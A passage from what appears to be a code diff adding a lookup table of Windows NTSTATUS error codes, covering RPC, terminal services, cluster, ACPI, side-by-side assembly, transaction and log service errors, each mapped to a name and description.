+ 0xC0030007: ("RPC_NT_SS_HANDLES_MISMATCH","The binding handles passed to an RPC do not match."),
+ 0xC0030008: ("RPC_NT_SS_CANNOT_GET_CALL_HANDLE","The stub is unable to get the call handle."),
+ 0xC0030009: ("RPC_NT_NULL_REF_POINTER","A null reference pointer was passed to the stub."),
+ 0xC003000A: ("RPC_NT_ENUM_VALUE_OUT_OF_RANGE","The enumeration value is out of range."),
+ 0xC003000B: ("RPC_NT_BYTE_COUNT_TOO_SMALL","The byte count is too small."),
+ 0xC003000C: ("RPC_NT_BAD_STUB_DATA","The stub received bad data."),
+ 0xC0030059: ("RPC_NT_INVALID_ES_ACTION","Invalid operation on the encoding/decoding handle."),
+ 0xC003005A: ("RPC_NT_WRONG_ES_VERSION","Incompatible version of the serializing package."),
+ 0xC003005B: ("RPC_NT_WRONG_STUB_VERSION","Incompatible version of the RPC stub."),
+ 0xC003005C: ("RPC_NT_INVALID_PIPE_OBJECT","The RPC pipe object is invalid or corrupt."),
+ 0xC003005D: ("RPC_NT_INVALID_PIPE_OPERATION","An invalid operation was attempted on an RPC pipe object."),
+ 0xC003005E: ("RPC_NT_WRONG_PIPE_VERSION","Unsupported RPC pipe version."),
+ 0xC003005F: ("RPC_NT_PIPE_CLOSED","The RPC pipe object has already been closed."),
+ 0xC0030060: ("RPC_NT_PIPE_DISCIPLINE_ERROR","The RPC call completed before all pipes were processed."),
+ 0xC0030061: ("RPC_NT_PIPE_EMPTY","No more data is available from the RPC pipe."),
+ 0xC0040035: ("STATUS_PNP_BAD_MPS_TABLE","A device is missing in the system BIOS MPS table. This device will not be used. Contact your system vendor for a system BIOS update."),
+ 0xC0040036: ("STATUS_PNP_TRANSLATION_FAILED","A translator failed to translate resources."),
+ 0xC0040037: ("STATUS_PNP_IRQ_TRANSLATION_FAILED","An IRQ translator failed to translate resources."),
+ 0xC0040038: ("STATUS_PNP_INVALID_ID","Driver %2 returned an invalid ID for a child device (%3)."),
+ 0xC0040039: ("STATUS_IO_REISSUE_AS_CACHED","Reissue the given operation as a cached I/O operation"),
+ 0xC00A0001: ("STATUS_CTX_WINSTATION_NAME_INVALID","Session name %1 is invalid."),
+ 0xC00A0002: ("STATUS_CTX_INVALID_PD","The protocol driver %1 is invalid."),
+ 0xC00A0003: ("STATUS_CTX_PD_NOT_FOUND","The protocol driver %1 was not found in the system path."),
+ 0xC00A0006: ("STATUS_CTX_CLOSE_PENDING","A close operation is pending on the terminal connection."),
+ 0xC00A0007: ("STATUS_CTX_NO_OUTBUF","No free output buffers are available."),
+ 0xC00A0008: ("STATUS_CTX_MODEM_INF_NOT_FOUND","The MODEM.INF file was not found."),
+ 0xC00A0009: ("STATUS_CTX_INVALID_MODEMNAME","The modem (%1) was not found in the MODEM.INF file."),
+ 0xC00A000A: ("STATUS_CTX_RESPONSE_ERROR","The modem did not accept the command sent to it. Verify that the configured modem name matches the attached modem."),
+ 0xC00A000B: ("STATUS_CTX_MODEM_RESPONSE_TIMEOUT","The modem did not respond to the command sent to it. Verify that the modem cable is properly attached and the modem is turned on."),
+ 0xC00A000C: ("STATUS_CTX_MODEM_RESPONSE_NO_CARRIER","Carrier detection has failed or the carrier has been dropped due to disconnection."),
+ 0xC00A000D: ("STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE","A dial tone was not detected within the required time. Verify that the phone cable is properly attached and functional."),
+ 0xC00A000E: ("STATUS_CTX_MODEM_RESPONSE_BUSY","A busy signal was detected at a remote site on callback."),
+ 0xC00A000F: ("STATUS_CTX_MODEM_RESPONSE_VOICE","A voice was detected at a remote site on callback."),
+ 0xC00A0010: ("STATUS_CTX_TD_ERROR","Transport driver error."),
+ 0xC00A0012: ("STATUS_CTX_LICENSE_CLIENT_INVALID","The client you are using is not licensed to use this system. Your logon request is denied."),
+ 0xC00A0013: ("STATUS_CTX_LICENSE_NOT_AVAILABLE","The system has reached its licensed logon limit. Try again later."),
+ 0xC00A0014: ("STATUS_CTX_LICENSE_EXPIRED","The system license has expired. Your logon request is denied."),
+ 0xC00A0015: ("STATUS_CTX_WINSTATION_NOT_FOUND","The specified session cannot be found."),
+ 0xC00A0016: ("STATUS_CTX_WINSTATION_NAME_COLLISION","The specified session name is already in use."),
+ 0xC00A0017: ("STATUS_CTX_WINSTATION_BUSY","The requested operation cannot be completed because the terminal connection is currently processing a connect, disconnect, reset, or delete operation."),
+ 0xC00A0018: ("STATUS_CTX_BAD_VIDEO_MODE","An attempt has been made to connect to a session whose video mode is not supported by the current client."),
+ 0xC00A0022: ("STATUS_CTX_GRAPHICS_INVALID","The application attempted to enable DOS graphics mode. DOS graphics mode is not supported."),
+ 0xC00A0024: ("STATUS_CTX_NOT_CONSOLE","The requested operation can be performed only on the system console. This is most often the result of a driver or system DLL requiring direct console access."),
+ 0xC00A0026: ("STATUS_CTX_CLIENT_QUERY_TIMEOUT","The client failed to respond to the server connect message."),
+ 0xC00A0027: ("STATUS_CTX_CONSOLE_DISCONNECT","Disconnecting the console session is not supported."),
+ 0xC00A0028: ("STATUS_CTX_CONSOLE_CONNECT","Reconnecting a disconnected session to the console is not supported."),
+ 0xC00A002A: ("STATUS_CTX_SHADOW_DENIED","The request to control another session remotely was denied."),
+ 0xC00A002B: ("STATUS_CTX_WINSTATION_ACCESS_DENIED","A process has requested access to a session, but has not been granted those access rights."),
+ 0xC00A002E: ("STATUS_CTX_INVALID_WD","The terminal connection driver %1 is invalid."),
+ 0xC00A002F: ("STATUS_CTX_WD_NOT_FOUND","The terminal connection driver %1 was not found in the system path."),
+ 0xC00A0030: ("STATUS_CTX_SHADOW_INVALID","The requested session cannot be controlled remotely. You cannot control your own session, a session that is trying to control your session, a session that has no user logged on, or other sessions from the console."),
+ 0xC00A0031: ("STATUS_CTX_SHADOW_DISABLED","The requested session is not configured to allow remote control."),
+ 0xC00A0032: ("STATUS_RDP_PROTOCOL_ERROR","The RDP protocol component %2 detected an error in the protocol stream and has disconnected the client."),
+ 0xC00A0033: ("STATUS_CTX_CLIENT_LICENSE_NOT_SET","Your request to connect to this terminal server has been rejected. Your terminal server client license number has not been entered for this copy of the terminal client. Contact your system administrator for help in entering a valid, unique license number for this terminal server client. Click OK to continue."),
+ 0xC00A0034: ("STATUS_CTX_CLIENT_LICENSE_IN_USE","Your request to connect to this terminal server has been rejected. Your terminal server client license number is currently being used by another user. Contact your system administrator to obtain a new copy of the terminal server client with a valid, unique license number. Click OK to continue."),
+ 0xC00A0035: ("STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE","The remote control of the console was terminated because the display mode was changed. Changing the display mode in a remote control session is not supported."),
+ 0xC00A0036: ("STATUS_CTX_SHADOW_NOT_RUNNING","Remote control could not be terminated because the specified session is not currently being remotely controlled."),
+ 0xC00A0037: ("STATUS_CTX_LOGON_DISABLED","Your interactive logon privilege has been disabled. Contact your system administrator."),
+ 0xC00A0038: ("STATUS_CTX_SECURITY_LAYER_ERROR","The terminal server security layer detected an error in the protocol stream and has disconnected the client."),
+ 0xC00A0039: ("STATUS_TS_INCOMPATIBLE_SESSIONS","The target session is incompatible with the current session."),
+ 0xC00B0001: ("STATUS_MUI_FILE_NOT_FOUND","The resource loader failed to find an MUI file."),
+ 0xC00B0002: ("STATUS_MUI_INVALID_FILE","The resource loader failed to load an MUI file because the file failed to pass validation."),
+ 0xC00B0003: ("STATUS_MUI_INVALID_RC_CONFIG","The RC manifest is corrupted with garbage data, is an unsupported version, or is missing a required item."),
+ 0xC00B0004: ("STATUS_MUI_INVALID_LOCALE_NAME","The RC manifest has an invalid culture name."),
+ 0xC00B0005: ("STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME","The RC manifest has and invalid ultimate fallback name."),
+ 0xC00B0006: ("STATUS_MUI_FILE_NOT_LOADED","The resource loader cache does not have a loaded MUI entry."),
+ 0xC00B0007: ("STATUS_RESOURCE_ENUM_USER_STOP","The user stopped resource enumeration."),
+ 0xC0130001: ("STATUS_CLUSTER_INVALID_NODE","The cluster node is not valid."),
+ 0xC0130002: ("STATUS_CLUSTER_NODE_EXISTS","The cluster node already exists."),
+ 0xC0130003: ("STATUS_CLUSTER_JOIN_IN_PROGRESS","A node is in the process of joining the cluster."),
+ 0xC0130004: ("STATUS_CLUSTER_NODE_NOT_FOUND","The cluster node was not found."),
+ 0xC0130005: ("STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND","The cluster local node information was not found."),
+ 0xC0130006: ("STATUS_CLUSTER_NETWORK_EXISTS","The cluster network already exists."),
+ 0xC0130007: ("STATUS_CLUSTER_NETWORK_NOT_FOUND","The cluster network was not found."),
+ 0xC0130008: ("STATUS_CLUSTER_NETINTERFACE_EXISTS","The cluster network interface already exists."),
+ 0xC0130009: ("STATUS_CLUSTER_NETINTERFACE_NOT_FOUND","The cluster network interface was not found."),
+ 0xC013000A: ("STATUS_CLUSTER_INVALID_REQUEST","The cluster request is not valid for this object."),
+ 0xC013000B: ("STATUS_CLUSTER_INVALID_NETWORK_PROVIDER","The cluster network provider is not valid."),
+ 0xC013000C: ("STATUS_CLUSTER_NODE_DOWN","The cluster node is down."),
+ 0xC013000D: ("STATUS_CLUSTER_NODE_UNREACHABLE","The cluster node is not reachable."),
+ 0xC013000E: ("STATUS_CLUSTER_NODE_NOT_MEMBER","The cluster node is not a member of the cluster."),
+ 0xC013000F: ("STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS","A cluster join operation is not in progress."),
+ 0xC0130010: ("STATUS_CLUSTER_INVALID_NETWORK","The cluster network is not valid."),
+ 0xC0130011: ("STATUS_CLUSTER_NO_NET_ADAPTERS","No network adapters are available."),
+ 0xC0130012: ("STATUS_CLUSTER_NODE_UP","The cluster node is up."),
+ 0xC0130013: ("STATUS_CLUSTER_NODE_PAUSED","The cluster node is paused."),
+ 0xC0130014: ("STATUS_CLUSTER_NODE_NOT_PAUSED","The cluster node is not paused."),
+ 0xC0130015: ("STATUS_CLUSTER_NO_SECURITY_CONTEXT","No cluster security context is available."),
+ 0xC0130016: ("STATUS_CLUSTER_NETWORK_NOT_INTERNAL","The cluster network is not configured for internal cluster communication."),
+ 0xC0130017: ("STATUS_CLUSTER_POISONED","The cluster node has been poisoned."),
+ 0xC0140001: ("STATUS_ACPI_INVALID_OPCODE","An attempt was made to run an invalid AML opcode."),
+ 0xC0140002: ("STATUS_ACPI_STACK_OVERFLOW","The AML interpreter stack has overflowed."),
+ 0xC0140003: ("STATUS_ACPI_ASSERT_FAILED","An inconsistent state has occurred."),
+ 0xC0140004: ("STATUS_ACPI_INVALID_INDEX","An attempt was made to access an array outside its bounds."),
+ 0xC0140005: ("STATUS_ACPI_INVALID_ARGUMENT","A required argument was not specified."),
+ 0xC0140006: ("STATUS_ACPI_FATAL","A fatal error has occurred."),
+ 0xC0140007: ("STATUS_ACPI_INVALID_SUPERNAME","An invalid SuperName was specified."),
+ 0xC0140008: ("STATUS_ACPI_INVALID_ARGTYPE","An argument with an incorrect type was specified."),
+ 0xC0140009: ("STATUS_ACPI_INVALID_OBJTYPE","An object with an incorrect type was specified."),
+ 0xC014000A: ("STATUS_ACPI_INVALID_TARGETTYPE","A target with an incorrect type was specified."),
+ 0xC014000B: ("STATUS_ACPI_INCORRECT_ARGUMENT_COUNT","An incorrect number of arguments was specified."),
+ 0xC014000C: ("STATUS_ACPI_ADDRESS_NOT_MAPPED","An address failed to translate."),
+ 0xC014000D: ("STATUS_ACPI_INVALID_EVENTTYPE","An incorrect event type was specified."),
+ 0xC014000E: ("STATUS_ACPI_HANDLER_COLLISION","A handler for the target already exists."),
+ 0xC014000F: ("STATUS_ACPI_INVALID_DATA","Invalid data for the target was specified."),
+ 0xC0140010: ("STATUS_ACPI_INVALID_REGION","An invalid region for the target was specified."),
+ 0xC0140011: ("STATUS_ACPI_INVALID_ACCESS_SIZE","An attempt was made to access a field outside the defined range."),
+ 0xC0140012: ("STATUS_ACPI_ACQUIRE_GLOBAL_LOCK","The global system lock could not be acquired."),
+ 0xC0140013: ("STATUS_ACPI_ALREADY_INITIALIZED","An attempt was made to reinitialize the ACPI subsystem."),
+ 0xC0140014: ("STATUS_ACPI_NOT_INITIALIZED","The ACPI subsystem has not been initialized."),
+ 0xC0140015: ("STATUS_ACPI_INVALID_MUTEX_LEVEL","An incorrect mutex was specified."),
+ 0xC0140016: ("STATUS_ACPI_MUTEX_NOT_OWNED","The mutex is not currently owned."),
+ 0xC0140017: ("STATUS_ACPI_MUTEX_NOT_OWNER","An attempt was made to access the mutex by a process that was not the owner."),
+ 0xC0140018: ("STATUS_ACPI_RS_ACCESS","An error occurred during an access to region space."),
+ 0xC0140019: ("STATUS_ACPI_INVALID_TABLE","An attempt was made to use an incorrect table."),
+ 0xC0140020: ("STATUS_ACPI_REG_HANDLER_FAILED","The registration of an ACPI event failed."),
+ 0xC0140021: ("STATUS_ACPI_POWER_REQUEST_FAILED","An ACPI power object failed to transition state."),
+ 0xC0150001: ("STATUS_SXS_SECTION_NOT_FOUND","The requested section is not present in the activation context."),
+ 0xC0150002: ("STATUS_SXS_CANT_GEN_ACTCTX","Windows was unble to process the application binding information. Refer to the system event log for further information."),
+ 0xC0150003: ("STATUS_SXS_INVALID_ACTCTXDATA_FORMAT","The application binding data format is invalid."),
+ 0xC0150004: ("STATUS_SXS_ASSEMBLY_NOT_FOUND","The referenced assembly is not installed on the system."),
+ 0xC0150005: ("STATUS_SXS_MANIFEST_FORMAT_ERROR","The manifest file does not begin with the required tag and format information."),
+ 0xC0150006: ("STATUS_SXS_MANIFEST_PARSE_ERROR","The manifest file contains one or more syntax errors."),
+ 0xC0150007: ("STATUS_SXS_ACTIVATION_CONTEXT_DISABLED","The application attempted to activate a disabled activation context."),
+ 0xC0150008: ("STATUS_SXS_KEY_NOT_FOUND","The requested lookup key was not found in any active activation context."),
+ 0xC0150009: ("STATUS_SXS_VERSION_CONFLICT","A component version required by the application conflicts with another component version that is already active."),
+ 0xC015000A: ("STATUS_SXS_WRONG_SECTION_TYPE","The type requested activation context section does not match the query API used."),
+ 0xC015000B: ("STATUS_SXS_THREAD_QUERIES_DISABLED","Lack of system resources has required isolated activation to be disabled for the current thread of execution."),
+ 0xC015000C: ("STATUS_SXS_ASSEMBLY_MISSING","The referenced assembly could not be found."),
+ 0xC015000E: ("STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET","An attempt to set the process default activation context failed because the process default activation context was already set."),
+ 0xC015000F: ("STATUS_SXS_EARLY_DEACTIVATION","The activation context being deactivated is not the most recently activated one."),
+ 0xC0150010: ("STATUS_SXS_INVALID_DEACTIVATION","The activation context being deactivated is not active for the current thread of execution."),
+ 0xC0150011: ("STATUS_SXS_MULTIPLE_DEACTIVATION","The activation context being deactivated has already been deactivated."),
+ 0xC0150012: ("STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY","The activation context of the system default assembly could not be generated."),
+ 0xC0150013: ("STATUS_SXS_PROCESS_TERMINATION_REQUESTED","A component used by the isolation facility has requested that the process be terminated."),
+ 0xC0150014: ("STATUS_SXS_CORRUPT_ACTIVATION_STACK","The activation context activation stack for the running thread of execution is corrupt."),
+ 0xC0150015: ("STATUS_SXS_CORRUPTION","The application isolation metadata for this process or thread has become corrupt."),
+ 0xC0150016: ("STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE","The value of an attribute in an identity is not within the legal range."),
+ 0xC0150017: ("STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME","The name of an attribute in an identity is not within the legal range."),
+ 0xC0150018: ("STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE","An identity contains two definitions for the same attribute."),
+ 0xC0150019: ("STATUS_SXS_IDENTITY_PARSE_ERROR","The identity string is malformed. This may be due to a trailing comma, more than two unnamed attributes, a missing attribute name, or a missing attribute value."),
+ 0xC015001A: ("STATUS_SXS_COMPONENT_STORE_CORRUPT","The component store has become corrupted."),
+ 0xC015001B: ("STATUS_SXS_FILE_HASH_MISMATCH","A component's file does not match the verification information present in the component manifest."),
+ 0xC015001C: ("STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT","The identities of the manifests are identical, but their contents are different."),
+ 0xC015001D: ("STATUS_SXS_IDENTITIES_DIFFERENT","The component identities are different."),
+ 0xC015001E: ("STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT","The assembly is not a deployment."),
+ 0xC015001F: ("STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY","The file is not a part of the assembly."),
+ 0xC0150020: ("STATUS_ADVANCED_INSTALLER_FAILED","An advanced installer failed during setup or servicing."),
+ 0xC0150021: ("STATUS_XML_ENCODING_MISMATCH","The character encoding in the XML declaration did not match the encoding used in the document."),
+ 0xC0150022: ("STATUS_SXS_MANIFEST_TOO_BIG","The size of the manifest exceeds the maximum allowed."),
+ 0xC0150023: ("STATUS_SXS_SETTING_NOT_REGISTERED","The setting is not registered."),
+ 0xC0150024: ("STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE","One or more required transaction members are not present."),
+ 0xC0150025: ("STATUS_SMI_PRIMITIVE_INSTALLER_FAILED","The SMI primitive installer failed during setup or servicing."),
+ 0xC0150026: ("STATUS_GENERIC_COMMAND_FAILED","A generic command executable returned a result that indicates failure."),
+ 0xC0150027: ("STATUS_SXS_FILE_HASH_MISSING","A component is missing file verification information in its manifest."),
+ 0xC0190001: ("STATUS_TRANSACTIONAL_CONFLICT","The function attempted to use a name that is reserved for use by another transaction."),
+ 0xC0190002: ("STATUS_INVALID_TRANSACTION","The transaction handle associated with this operation is invalid."),
+ 0xC0190003: ("STATUS_TRANSACTION_NOT_ACTIVE","The requested operation was made in the context of a transaction that is no longer active."),
+ 0xC0190004: ("STATUS_TM_INITIALIZATION_FAILED","The transaction manager was unable to be successfully initialized. Transacted operations are not supported."),
+ 0xC0190005: ("STATUS_RM_NOT_ACTIVE","Transaction support within the specified file system resource manager was not started or was shut down due to an error."),
+ 0xC0190006: ("STATUS_RM_METADATA_CORRUPT","The metadata of the resource manager has been corrupted. The resource manager will not function."),
+ 0xC0190007: ("STATUS_TRANSACTION_NOT_JOINED","The resource manager attempted to prepare a transaction that it has not successfully joined."),
+ 0xC0190008: ("STATUS_DIRECTORY_NOT_RM","The specified directory does not contain a file system resource manager."),
+ 0xC019000A: ("STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE","The remote server or share does not support transacted file operations."),
+ 0xC019000B: ("STATUS_LOG_RESIZE_INVALID_SIZE","The requested log size for the file system resource manager is invalid."),
+ 0xC019000C: ("STATUS_REMOTE_FILE_VERSION_MISMATCH","The remote server sent mismatching version number or Fid for a file opened with transactions."),
+ 0xC019000F: ("STATUS_CRM_PROTOCOL_ALREADY_EXISTS","The resource manager tried to register a protocol that already exists."),
+ 0xC0190010: ("STATUS_TRANSACTION_PROPAGATION_FAILED","The attempt to propagate the transaction failed."),
+ 0xC0190011: ("STATUS_CRM_PROTOCOL_NOT_FOUND","The requested propagation protocol was not registered as a CRM."),
+ 0xC0190012: ("STATUS_TRANSACTION_SUPERIOR_EXISTS","The transaction object already has a superior enlistment, and the caller attempted an operation that would have created a new superior. Only a single superior enlistment is allowed."),
+ 0xC0190013: ("STATUS_TRANSACTION_REQUEST_NOT_VALID","The requested operation is not valid on the transaction object in its current state."),
+ 0xC0190014: ("STATUS_TRANSACTION_NOT_REQUESTED","The caller has called a response API, but the response is not expected because the transaction manager did not issue the corresponding request to the caller."),
+ 0xC0190015: ("STATUS_TRANSACTION_ALREADY_ABORTED","It is too late to perform the requested operation, because the transaction has already been aborted."),
+ 0xC0190016: ("STATUS_TRANSACTION_ALREADY_COMMITTED","It is too late to perform the requested operation, because the transaction has already been committed."),
+ 0xC0190017: ("STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER","The buffer passed in to NtPushTransaction or NtPullTransaction is not in a valid format."),
+ 0xC0190018: ("STATUS_CURRENT_TRANSACTION_NOT_VALID","The current transaction context associated with the thread is not a valid handle to a transaction object."),
+ 0xC0190019: ("STATUS_LOG_GROWTH_FAILED","An attempt to create space in the transactional resource manager's log failed. The failure status has been recorded in the event log."),
+ 0xC0190021: ("STATUS_OBJECT_NO_LONGER_EXISTS","The object (file, stream, or link) that corresponds to the handle has been deleted by a transaction savepoint rollback."),
+ 0xC0190022: ("STATUS_STREAM_MINIVERSION_NOT_FOUND","The specified file miniversion was not found for this transacted file open."),
+ 0xC0190023: ("STATUS_STREAM_MINIVERSION_NOT_VALID","The specified file miniversion was found but has been invalidated. The most likely cause is a transaction savepoint rollback."),
+ 0xC0190024: ("STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION","A miniversion may be opened only in the context of the transaction that created it."),
+ 0xC0190025: ("STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT","It is not possible to open a miniversion with modify access."),
+ 0xC0190026: ("STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS","It is not possible to create any more miniversions for this stream."),
+ 0xC0190028: ("STATUS_HANDLE_NO_LONGER_VALID","The handle has been invalidated by a transaction. The most likely cause is the presence of memory mapping on a file or an open handle when the transaction ended or rolled back to savepoint."),
+ 0xC0190030: ("STATUS_LOG_CORRUPTION_DETECTED","The log data is corrupt."),
+ 0xC0190032: ("STATUS_RM_DISCONNECTED","The transaction outcome is unavailable because the resource manager responsible for it is disconnected."),
+ 0xC0190033: ("STATUS_ENLISTMENT_NOT_SUPERIOR","The request was rejected because the enlistment in question is not a superior enlistment."),
+ 0xC0190036: ("STATUS_FILE_IDENTITY_NOT_PERSISTENT","The file cannot be opened in a transaction because its identity depends on the outcome of an unresolved transaction."),
+ 0xC0190037: ("STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY","The operation cannot be performed because another transaction is depending on this property not changing."),
+ 0xC0190038: ("STATUS_CANT_CROSS_RM_BOUNDARY","The operation would involve a single file with two transactional resource managers and is, therefore, not allowed."),
+ 0xC0190039: ("STATUS_TXF_DIR_NOT_EMPTY","The $Txf directory must be empty for this operation to succeed."),
+ 0xC019003A: ("STATUS_INDOUBT_TRANSACTIONS_EXIST","The operation would leave a transactional resource manager in an inconsistent state and is therefore not allowed."),
+ 0xC019003B: ("STATUS_TM_VOLATILE","The operation could not be completed because the transaction manager does not have a log."),
+ 0xC019003C: ("STATUS_ROLLBACK_TIMER_EXPIRED","A rollback could not be scheduled because a previously scheduled rollback has already executed or been queued for execution."),
+ 0xC019003D: ("STATUS_TXF_ATTRIBUTE_CORRUPT","The transactional metadata attribute on the file or directory %hs is corrupt and unreadable."),
+ 0xC019003E: ("STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION","The encryption operation could not be completed because a transaction is active."),
+ 0xC019003F: ("STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED","This object is not allowed to be opened in a transaction."),
+ 0xC0190040: ("STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE","Memory mapping (creating a mapped section) a remote file under a transaction is not supported."),
+ 0xC0190043: ("STATUS_TRANSACTION_REQUIRED_PROMOTION","Promotion was required to allow the resource manager to enlist, but the transaction was set to disallow it."),
+ 0xC0190044: ("STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION","This file is open for modification in an unresolved transaction and may be opened for execute only by a transacted reader."),
+ 0xC0190045: ("STATUS_TRANSACTIONS_NOT_FROZEN","The request to thaw frozen transactions was ignored because transactions were not previously frozen."),
+ 0xC0190046: ("STATUS_TRANSACTION_FREEZE_IN_PROGRESS","Transactions cannot be frozen because a freeze is already in progress."),
+ 0xC0190047: ("STATUS_NOT_SNAPSHOT_VOLUME","The target volume is not a snapshot volume. This operation is valid only on a volume mounted as a snapshot."),
+ 0xC0190048: ("STATUS_NO_SAVEPOINT_WITH_OPEN_FILES","The savepoint operation failed because files are open on the transaction, which is not permitted."),
+ 0xC0190049: ("STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION","The sparse operation could not be completed because a transaction is active on the file."),
+ 0xC019004A: ("STATUS_TM_IDENTITY_MISMATCH","The call to create a transaction manager object failed because the Tm Identity that is stored in the log file does not match the Tm Identity that was passed in as an argument."),
+ 0xC019004B: ("STATUS_FLOATED_SECTION","I/O was attempted on a section object that has been floated as a result of a transaction ending. There is no valid data."),
+ 0xC019004C: ("STATUS_CANNOT_ACCEPT_TRANSACTED_WORK","The transactional resource manager cannot currently accept transacted work due to a transient condition, such as low resources."),
+ 0xC019004D: ("STATUS_CANNOT_ABORT_TRANSACTIONS","The transactional resource manager had too many transactions outstanding that could not be aborted. The transactional resource manager has been shut down."),
+ 0xC019004E: ("STATUS_TRANSACTION_NOT_FOUND","The specified transaction was unable to be opened because it was not found."),
+ 0xC019004F: ("STATUS_RESOURCEMANAGER_NOT_FOUND","The specified resource manager was unable to be opened because it was not found."),
+ 0xC0190050: ("STATUS_ENLISTMENT_NOT_FOUND","The specified enlistment was unable to be opened because it was not found."),
+ 0xC0190051: ("STATUS_TRANSACTIONMANAGER_NOT_FOUND","The specified transaction manager was unable to be opened because it was not found."),
+ 0xC0190052: ("STATUS_TRANSACTIONMANAGER_NOT_ONLINE","The specified resource manager was unable to create an enlistment because its associated transaction manager is not online."),
+ 0xC0190053: ("STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION","The specified transaction manager was unable to create the objects contained in its log file in the Ob namespace. Therefore, the transaction manager was unable to recover."),
+ 0xC0190054: ("STATUS_TRANSACTION_NOT_ROOT","The call to create a superior enlistment on this transaction object could not be completed because the transaction object specified for the enlistment is a subordinate branch of the transaction. Only the root of the transaction can be enlisted as a superior."),
+ 0xC0190055: ("STATUS_TRANSACTION_OBJECT_EXPIRED","Because the associated transaction manager or resource manager has been closed, the handle is no longer valid."),
+ 0xC0190056: ("STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION","The compression operation could not be completed because a transaction is active on the file."),
+ 0xC0190057: ("STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED","The specified operation could not be performed on this superior enlistment because the enlistment was not created with the corresponding completion response in the NotificationMask."),
+ 0xC0190058: ("STATUS_TRANSACTION_RECORD_TOO_LONG","The specified operation could not be performed because the record to be logged was too long. This can occur because either there are too many enlistments on this transaction or the combined RecoveryInformation being logged on behalf of those enlistments is too long."),
+ 0xC0190059: ("STATUS_NO_LINK_TRACKING_IN_TRANSACTION","The link-tracking operation could not be completed because a transaction is active."),
+ 0xC019005A: ("STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION","This operation cannot be performed in a transaction."),
+ 0xC019005B: ("STATUS_TRANSACTION_INTEGRITY_VIOLATED","The kernel transaction manager had to abort or forget the transaction because it blocked forward progress."),
+ 0xC0190060: ("STATUS_EXPIRED_HANDLE","The handle is no longer properly associated with its transaction. It may have been opened in a transactional resource manager that was subsequently forced to restart. Please close the handle and open a new one."),
+ 0xC0190061: ("STATUS_TRANSACTION_NOT_ENLISTED","The specified operation could not be performed because the resource manager is not enlisted in the transaction."),
+ 0xC01A0001: ("STATUS_LOG_SECTOR_INVALID","The log service found an invalid log sector."),
+ 0xC01A0002: ("STATUS_LOG_SECTOR_PARITY_INVALID","The log service encountered a log sector with invalid block parity."),
+ 0xC01A0003: ("STATUS_LOG_SECTOR_REMAPPED","The log service encountered a remapped log sector."),
+ 0xC01A0004: ("STATUS_LOG_BLOCK_INCOMPLETE","The log service encountered a partial or incomplete log block."),
+ 0xC01A0005: ("STATUS_LOG_INVALID_RANGE","The log service encountered an attempt to access data outside the active log range."),
+ 0xC01A0006: ("STATUS_LOG_BLOCKS_EXHAUSTED","The log service user-log marshaling buffers are exhausted."),
+ 0xC01A0007: ("STATUS_LOG_READ_CONTEXT_INVALID","The log service encountered an attempt to read from a marshaling area with an invalid read context."),
+ 0xC01A0008: ("STATUS_LOG_RESTART_INVALID","The log service encountered an invalid log restart area."),
+ 0xC01A0009: ("STATUS_LOG_BLOCK_VERSION","The log service encountered an invalid log block version."),
+ 0xC01A000A: ("STATUS_LOG_BLOCK_INVALID","The log service encountered an invalid log block."),
+ 0xC01A000B: ("STATUS_LOG_READ_MODE_INVALID","The log service encountered an attempt to read the log with an invalid read mode."),
+ 0xC01A000D: ("STATUS_LOG_METADATA_CORRUPT","The log service encountered a corrupted metadata file."),
+ 0xC01A000E: ("STATUS_LOG_METADATA_INVALID","The log service encountered a metadata file that could not be created by the log file system."),
+ 0xC01A000F: ("STATUS_LOG_METADATA_INCONSISTENT","The log service encountered a metadata file with inconsistent data."),
+ 0xC01A0010: ("STATUS_LOG_RESERVATION_INVALID","The log service encountered an attempt to erroneously allocate or dispose reservation space."),
+ 0xC01A0011: ("STATUS_LOG_CANT_DELETE","The log service cannot delete the log file or the file system container."),
+ 0xC01A0012: ("STATUS_LOG_CONTAINER_LIMIT_EXCEEDED","The log service has reached the maximum allowable containers allocated to a log file."),
+ 0xC01A0013: ("STATUS_LOG_START_OF_LOG","The log service has attempted to read or write backward past the start of the log."),
+ 0xC01A0014: ("STATUS_LOG_POLICY_ALREADY_INSTALLED","The log policy could not be installed because a policy of the same type is already present."),
+ 0xC01A0015: ("STATUS_LOG_POLICY_NOT_INSTALLED","The log policy in question was not installed at the time of the request."),
+ 0xC01A0016: ("STATUS_LOG_POLICY_INVALID","The installed set of policies on the log is invalid."),
+ 0xC01A0017: ("STATUS_LOG_POLICY_CONFLICT","A policy on the log in question prevented the operation from completing."),
+ 0xC01A0018: ("STATUS_LOG_PINNED_ARCHIVE_TAIL","The log space cannot be reclaimed because the log is pinned by the archive tail."),
+ 0xC01A0019: ("STATUS_LOG_RECORD_NONEXISTENT","The log record is not a record in the log file."),
